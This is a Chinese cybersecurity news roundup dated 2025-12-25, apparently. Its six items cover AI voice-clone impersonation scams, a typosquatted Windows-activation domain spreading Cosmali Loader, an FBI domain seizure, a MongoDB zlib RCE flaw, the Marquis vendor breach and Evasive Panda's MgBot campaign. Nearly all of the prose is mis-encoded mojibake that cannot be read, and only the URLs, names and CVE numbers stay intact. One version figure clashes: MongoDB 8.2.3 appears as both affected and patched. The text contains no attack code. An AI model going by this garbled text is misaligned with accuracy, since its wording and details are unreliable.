·¸×ï·Ö×Ó¼ÙÒâÃÀ¹ú¸ß¼¶¹ÙÔ±½øÐÐÐÅÏ¢Ú¿Æ­

°ä²¼¹¦·ò 2025-12-25

1. ·¸×ï·Ö×Ó¼ÙÒâÃÀ¹ú¸ß¼¶¹ÙÔ±½øÐÐÐÅÏ¢Ú¿Æ­


12ÔÂ21ÈÕ £¬ÃÀ¹úÁª¹úµ÷²é¾Ö½üÈÕ°ä²¼ÖÒ¸æ £¬ÍøÂç·¸×ï·Ö×Ó×Ô2023ÄêÆð³ÖÐø¼ÙÒâÖݵ±¾Ö¸ß¼¶¹ÙÔ±¡¢°×¹¬¹ÙÔ±¡¢ÄÚ¸ó³ÉÔ±¼°¹ú»áÒéÔ± £¬ÀûÓöÌÐÅÓëÈËΪÖÇÄÜÌìÉúµÄÓïÒôÐÅÏ¢ £¬Õë¶Ô¹ÙÔ±¼ÒÈ˼°¸öÈËÊìÈËÖ´Ðо«×¼Ú¿Æ­  ¡£´ËÀ๥»÷ͨ¹ý¡°¶ÌÐÅ´¹µö+ÓïÒô¿Ë¡¡±Ë«³Á¼¿Á©·¢Õ¹£º·¸×ï·Ö×ÓÊ×ÏÈ·¢ËÍ¿´ËÆÀ´×ÔȨÍþ»ú¹¹µÄڲƭ¶ÌÐÅ £¬Ëæºó²¦´òAIÌìÉúµÄÓïÒôµç»°»òÁôÏÂÓïÒôÁôÑÔ £¬ÒÔ»áÉÌÊìϤ»°ÌâΪµö¶ü £¬Ñ¸ËÙÒªÇóÊܺ¦Õß×ªÒÆÖÁSignal¡¢Telegram¡¢WhatsAppµÈ¼ÓÃÜÒÆ¶¯ÀûÓýøÇ°½øÒ»²½¹µÍ¨  ¡£ÔÚ¼ÓÃÜÀûÓÃÖÐ £¬¹¥»÷Õß»áͨ¹ýÌÖÂÛʱÊ¡¢Ë«±ß¹ØÏµ £¬»òÐé¹¹¡°¶­Ê»áÌáÃû¡±¡°ÆÌÅÅÓë×Üͳ»áÎµÈ³¡¾°³ÉÁ¢ÐÅÀµ £¬½ø¶øË÷ÒªÑéÖ¤ÂëÒÔͬ²½ÁªÏµÈËÁÐ±í¡¢»ñÈ¡»¤ÕÕµÈÃô¸ÐÎļþ¸±±¾¡¢ÒªÇóÏòº£±í½ðÈÚ»ú¹¹»ã¿î £¬»òÓÕµ¼½éÉÜͬ»ï  ¡£GetReal SecurityÍþв×êÑÐÖ÷¹ÜÌÀÄ·¡¤¿ËÂÞ˹ָ³ö £¬ÍþвÐÐΪÕßÕýÀûÓÃÉî¶ÈαÔì¼¼ÊõÖ´ÐÐÉç»á¹¤³Ì¹¥»÷ £¬½öÐè30ÃëÓïÒôÑù±¾¼´¿Éͨ¹ýAIÓïÒô¿Ë¡¸ß¶ÈÕæÇзÂÕÕËûÈË £¬¶ø¹«Ö°ÈËÔ±ºÍ¸ß¹ÜµÄÓïÒôÑù±¾¼«Ò×ͨ¹ý¹«¿ªÇþ·»ñÈ¡  ¡£


https://cybernews.com/news/criminals-impersonate-senior-us-officials-in-messaging-scams/


2. ƴдÃýÎóÓòÃûÒý·¢Cosmali Loader¶ñÒâÈí¼þϰȾ


12ÔÂ24ÈÕ £¬½üÈÕ £¬ÍøÂ簲ȫÁìÓòÆØ³öһ·ÒòÓòÃûƴдÃýÎóµ¼ÖµĶñÒâÈí¼þϰȾÊÂÎñ  ¡£¹¥»÷ÕßÀûÓÃÓû§ÊäÈëºöÂÔ £¬ÇÀ×¢Óë΢Èí¼¤»î¾ç±¾£¨MAS£©¹Ù·½ÓòÃû¸ß¶ÈÀàËÆµÄÓòÃû¡°get.activate[.]win¡± £¬½ö±È¹Ù·½ÓòÃû¡°get.activated.win¡±ÉÙÒ»¸ö×Öĸ¡°d¡± £¬ÓÕµ¼Óû§½Ó¼û²¢Ö´ÐжñÒâPowerShell¾ç±¾ £¬×îÖÕµ¼ÖÂWindowsϵͳ±»¡°Cosmali Loader¡±¶ñÒâÈí¼þϰȾ  ¡£¾Ý±¨Â· £¬¶àÃûMASÓû§ÒÑÔÚRedditƽ̨»ã±¨ÏµÍ³³öÏÖCosmali LoaderϰȾµÄµ¯³öÖÒ¸æ  ¡£°²È«×êÑÐÔ±RussianPanda·ÖÎö·¢ÏÖ £¬¸Ã¶ñÒâÈí¼þ½ÚÔìÃæ°å´æÔÚ°²È«·ì϶ £¬¹¥»÷Õ߿ɽè´ËÔ¶³Ì½Ó¼ûÊܺ¦ÕßÍÆËã»ú £¬²¢²¿Êð¼ÓÃÜÇ®±ÒÍڿ󹤾߼°XWormÔ¶³Ì½Ó¼ûľÂí£¨RAT£©  ¡£GDATA¶ñÒâÈí¼þ·ÖÎöʦKarsten Hahn´ËǰҲ·¢ÏÖ¹ýÀàËÆµ¯³ö֪ͨ £¬½øÒ»²½Ö¤ÊµÕâ´ÎÊÂÎñÓ뿪ԴCosmali Loader¶ñÒâÈí¼þ´æÔÚ¹ØÁª  ¡£MAS×÷Ϊ¿ªÔ´PowerShell¾ç±¾¼¯ÖÐ £¬Í¨¹ýHWID¼¤»î¡¢KMS·ÂÕյȼ¼ÊõʵÏÖWindows¼°OfficeµÄ×Ô¶¯¼¤»î £¬µ«Î¢ÈíÃ÷È·½«ÆäÊÓΪµÁ°æ¹¤¾ß £¬ÒòÆäѡȡδÊÚȨ¼¿Á©ÈƹýÐí¿Éϵͳ  ¡£ÏîÄ¿ÊØ»¤ÕßÒÑÏòÓû§·¢³öÖÒ¸æ £¬Ç¿µ÷Ö´ÐкÅÁîǰÐè×Ðϸ²é¶ÔÓòÃûƴд £¬Ô¤·ÀÒòÊäÈëÃýÎó½Ó¼û¶ñÒâÓòÃû  ¡£


https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/


3. FBI²é·âweb3adspanels[.]orgÓòÃû


12ÔÂ24ÈÕ £¬½üÈÕ £¬ÃÀ¹úÁª¹úµ÷²é¾Ö£¨FBI£©²é·âÁËÓòÃû¡°web3adspanels[.]org¡±¼°ÆäÊý¾Ý¿â £¬¸ÃÓòÃû±»·¸×ïÍÅ»ïÓÃÓÚ´æ´¢ºÍ´Û¸Ä´ÓÃÀ¹úÊܺ¦Õß´¦ÇÔÈ¡µÄÒøÐеǼƾ֤ £¬½ø¶øÖ´Ðдó¹æÄ£ÒøÐÐÕË»§µÁÓÃÚ¿Æ­  ¡£¾Ý˾·¨²¿Åû¶ £¬¸Ã·¸×ïÍÅ»ïͨ¹ýÔڹȸ衢±ØÓ¦µÈËÑË÷ÒýÇæÍ¶·ÅÐéα¸æ°× £¬·ÂÕÕÕæÊµÒøÐиæ°×ÓÕµ¼Óû§µã»÷  ¡£Êܺ¦Õßµã»÷ºó»á±»³Á¶¨ÏòÖÁÓÉ·¸×ï·Ö×Ó½ÚÔìµÄÚ²Æ­ÍøÕ¾ £¬µ±Óû§ÊäÈëÒøÐеǼƾ֤ʱ £¬ÍøÕ¾ÉϵĶñÒâÈí¼þ»áÁ¢¼´ÇÔÈ¡ÕâЩÐÅÏ¢  ¡£·¸×ï·Ö×ÓËæºóÀûÓÃÇÔÈ¡µÄƾ֤µÇÂ¼ÕæÊµÒøÐÐÍøÕ¾ £¬µÁÈ¡ÕË»§×ʽð  ¡£µ÷²éÏÔʾ £¬¸ÃÓòÃû×÷Ϊºó¶ËÍøÂçÃæ°å £¬ÍйÜÁËÊýǧ¸ö±»µÁµÄÒøÐеǼƾ֤ £¬²¢³ÖÐøÔËÓªÖÁ2025Äê11Ô  ¡£°®É³ÄáÑǵ±¾ÖÒѱ£Áô²¢ÍøÂçÁËÍйܴ¹µöÒ³ÃæµÄ·þÎñÆ÷Êý¾Ý¼°±»µÁƾ֤ £¬ÎªºóÐøµ÷²éÌṩ¹Ø¼üÖ¤¾Ý  ¡£FBIÈ·ÈÏ £¬ÖÁÉÙ19ÃûÃÀ¹úÊܺ¦ÕßÒò¸ÃȦÌ×ËðʧԼ1460ÍòÃÀÔª £¬²¢Ãæ¶Ô2800ÍòÃÀÔªµÄδËìËðʧ  ¡£


https://securityaffairs.com/186094/cyber-crime/fbi-seized-web3adspanels-org-hosting-stolen-logins.html


4. MongoDB´¹Î£¹«¸æ¸ßΣRCE·ì϶ÐèÁ¢¼´½¨¸´


12ÔÂ24ÈÕ £¬MongoDB½üÈÕ°ä²¼´¹Î£°²È«¹«¸æ £¬ÖÒ¸æITÖÎÀíÔ±±ØÐëÁ¢¼´½¨¸´±àºÅΪCVE-2025-14847µÄ¸ßΣ·ì϶  ¡£¸Ã·ì϶ӰÏìMongoDB 8.2.0ÖÁ8.2.3¡¢8.0.0ÖÁ8.0.16¡¢7.0.0ÖÁ7.0.26¡¢6.0.0ÖÁ6.0.26¡¢5.0.0ÖÁ5.0.31¡¢4.4.0ÖÁ4.4.29¼°ËùÓÐv4.2¡¢v4.0¡¢v3.6°æ±¾ £¬Î´¾­Éí·ÝÑéÖ¤µÄ¹¥»÷Õß¿ÉÀûÓô˷ì϶ÌáÒéµÍ¸´ÔÓ¶ÈÔ¶³Ì´úÂëÖ´ÐУ¨RCE£©¹¥»÷ £¬ÎÞÐèÓû§½»»¥¼´¿É½ÚÔìÖ¸±ê·þÎñÆ÷  ¡£·ì϶±¾Ô­ÔÚÓÚMongoDB·þÎñÆ÷¶Ô³¤¶È²ÎÊýµÄ²»Ò»Ö´¦ÖûúÔì £¬¹¥»÷Õß¿Éͨ¹ý´Û¸ÄzlibѹËõʵÏÖÖеÄÊý¾Ý°ü £¬´¥·¢Î´³õʼ»¯µÄ¶ÑÄÚ´æ½Ó¼û £¬½ø¶øÖ´ÐÐËÁÒâ´úÂë  ¡£MongoDB°²È«ÍŶÓÇ¿µ÷ £¬¸Ã·ì϶ÒѾ߱¸±»´ó¹æÄ£ÀûÓõÄǰÌá £¬½¨ÒéÖÎÀíÔ±Á¢¼´Éý¼¶ÖÁÒѽ¨¸´°æ±¾£º8.2.3¡¢8.0.17¡¢7.0.28¡¢6.0.27¡¢5.0.32»ò4.4.30  ¡£ÈôÎÞ·¨Á¢¼´Éý¼¶ £¬ÐèÔÚÆô¶¯mongod/mongosʱͨ¹ýnetworkMessageCompressors»ònet.compression.compressors²ÎÊýÏÔʽ½ûÓÃzlibѹËõÖ°ÄÜ  ¡£


https://www.bleepingcomputer.com/news/security/mongodb-warns-admins-to-patch-severe-rce-flaw-immediately/


5. MarquisÔâºÚ¿Í¹¥»÷Ö¶à¼ÒÒøÐпͻ§Êý¾Ýй¶


12ÔÂ24ÈÕ £¬½üÈÕ £¬Á½¼ÒÃÀ¹úÒøÐÐVeraBankºÍArtisans' BankÏà¼ÌÅû¶ÒòµÚÈý·½¹©¸øÉÌMarquis Software SolutionsÔâ·êºÚ¿Í¹¥»÷ £¬µ¼Ö´óÁ¿¿Í»§ÐÅϢй¶  ¡£×ܲ¿Î»Óڵ¿ËÈøË¹ÖݵÄVeraBankй© £¬Õâ´ÎÊÂÎñÓ°Ïì37,318Ãû¿Í»§ £¬Ð¹Â¶ÐÅÏ¢Ô̺¬ÐÕÃû¼°ÆäËûδÃ÷È·×¢Ã÷µÄÓ×ÎÒÐÅÏ¢ £¬¾ßÌåй¶ÄÚÈÝÒò¿Í»§¶øÒì  ¡£ÌØÀ­»ªÖݵÄArtisans' BankÔò°µÊ¾ £¬32,344Ãû¿Í»§µÄÐÕÃûºÍÉç»á±£ÏÕºÅÂë¿ÉÄÜÔâδ¾­ÊÚȨ½Ó¼û  ¡£Á½¼ÒÒøÐоùÇ¿µ÷ £¬¹¥»÷½öÏÞÓÚMarquisϵͳ £¬Æä×ÔÉíϵͳδÊÜÓ°Ïì  ¡£Marquis·½Ã氵ʾ £¬ÒѾÍ8ÔÂ14ÈÕ²úÉúµÄÊý¾Ýй¶ÊÂÎñ·¢Õ¹ÄÚ²¿µ÷²é²¢Í¨Öª·¨Âɲ¿ÃÅ  ¡£È»¶ø £¬Artisans' BankÖ±ÖÁ10ÔÂÏÂÑ®²Å»ñϤ´ËÊ £¬½üÆÚ²ÅÒâʶµ½¿Í»§ÐÅÏ¢¿ÉÄÜй¶  ¡£11Ô £¬Å²Íþ´¢ÐîÒøÐУ¨NSB£©ÔøÒòMarquisÔâ·êÀÕË÷Èí¼þ¹¥»÷ £¬µ¼ÖÂ51,000Ãû¿Í»§ÐÕÃû¡¢µØÖ·¡¢µ®ÉúÈÕÆÚ¡¢Éç»á±£ÏÕºÅÂ롢˰Îñ¼ø±ðºÅÂë¼°²ÆÕþÕË»§ÐÅÏ¢µÈÃô¸ÐÊý¾Ýй¶  ¡£


https://cybernews.com/news/bank-marquis-software-vendor-attack/


6. Evasive PandaÕë¶Ô¶à¹úÖ´Ðо«×¼ÉøÈë


12ÔÂ25ÈÕ £¬¿¨°Í˹»ù³¢ÊÔÊÒ½üÈÕ°ä²¼»ã±¨ £¬¸æ·¢³ôÃûÔ¶ÑïµÄÍøÂç¼äµý×éÖ¯Evasive PandaÔÚ2022Äê11ÔÂÖÁ2024Äê11ÔÂÆÚ¼ä £¬Õë¶ÔÖйú¡¢Ó¡¶È¼°ÍÁ¶úÆäÌáÒéÐÂÒ»ÂÖ¸´ÔÓ¹¥»÷  ¡£¸Ã×éÖ¯×Ô2012ÄêÆð»îÔ¾ £¬Í¨¹ýDNS½Ù³Ö¡¢ÖÐÑëÈ˹¥»÷£¨AitM£©¼°¼Ù×°Èí¼þ¸üеȼ¿Á© £¬´«²¼±êÖ¾ÐÔºóÃÅ·¨Ê½MgBot £¬ÊµÏÖ³Ö¾ÃϵͳפÁôÓëÊý¾ÝÇÔÈ¡  ¡£¹¥»÷Á´ÌõʼÓÚ¾«ÐÄÉè¼ÆµÄ¡°ºÏ·¨¼Ù×°¡±£º¹¥»÷Õß¼ÙÒâËѺüÊÓÆµ¡¢°®ÆæÒÕÊÓÆµ¡¢IObit Smart Defrag¼°ÌÚѶQQµÈÈȵãÈí¼þµÄ¸üз¨Ê½ £¬ÔںϷ¨×°ÖÃÎļþ¼ÐÖÐÖ²Èë¶ñÒâ´úÂë £¬ÓÉÊÜÐÅÀµÏµÍ³·þÎñÖ´ÐÐ  ¡£¸üÒñ±ÎµÄÊÇ £¬×éÖ¯ÀûÓÃAitM¼¼Êõ½Ù³ÖÍøÂçÁ÷Á¿ £¬Í¨¹ý´Û¸ÄDNSÏìÓ¦ £¬½«Óû§¶Ôdictionary.comµÄ½Ó¼û³Á¶¨ÏòÖÁ¹¥»÷Õß½ÚÔìµÄ·þÎñÆ÷ £¬ÒÔ¼Ù×°³ÉPNGÎļþµÄ¼ÓÃÜshellcode´ó¾Ö¼ÓÔØµÚ¶þ½×¶ÎÓÐÐ§ÔØºÉ  ¡£ÕâÖÖ»ùÓÚµØÀíµØÎ»ºÍISPµÄ¶¨ÏòͶ·ÅÕ½Êõ £¬Ê¹¹¥»÷¼«¾ßÕë¶ÔÐÔÇÒÄÑÒÔÔÚ³¢ÊÔÊÒ¸´ÏÖ  ¡£Ð¿ª·¢µÄ¼ÓÔØÆ÷¼Ù×°³ÉWindows¿âÎļþ £¬Í¨¹ýDLL²à¼ÓÔØ¼¼Êõ½«MgBot×¢Èësvchost.exeµÈϵͳ¹ý³Ì £¬ÉõÖÁÀûÓÃÊ®ÄêǰµÄÊðÃû¿ÉÖ´ÐÐÎļþÌӱܼì²â  ¡£


https://securityonline.info/evasive-panda-apt-hijacks-dictionary-com-and-app-updates-in-two-year-spree/